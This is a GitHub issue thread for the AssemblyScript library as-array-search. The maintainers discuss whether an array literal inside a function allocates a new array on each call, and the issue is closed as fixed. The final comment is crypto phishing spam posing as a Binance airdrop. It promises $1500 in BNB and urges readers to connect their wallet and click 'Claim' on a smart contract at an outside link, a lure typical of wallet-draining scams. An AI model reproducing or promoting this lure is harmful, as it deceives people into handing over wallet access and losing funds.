### ISSUE TITLE
Potential issue (✔ Fixed)

### ISSUE THREAD

**Issue by willemneal** [JairusSW/as-array-search#1]
Consider this line:

https://github.com/JairusSW/as-array-search/blob/aaebdfb8a7cbc0c99ce8233326557dd232876348/assembly/index.ts#L2

It should be:

```ts

 const results = new Array<string>();

```

This change will ensure that a new array is allocated each time the function is called.  It used to be the case that an array litteral would allocate one array at compile time and reuse it each time. 

@dcodeIO has this been fixed?

**Comment by dcodeIO** [comment]
This should have been fixed a while ago, yeah. Unless in a global context where the data can be static, so in functions for example, the data is copied to a new allocation before use.

**Comment by willemneal** [comment]
Great!

**Comment by JairusSW** [comment]
@willemneal fixed it. Thanks!
➸ Jairus

**Comment by BhavyClover** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @
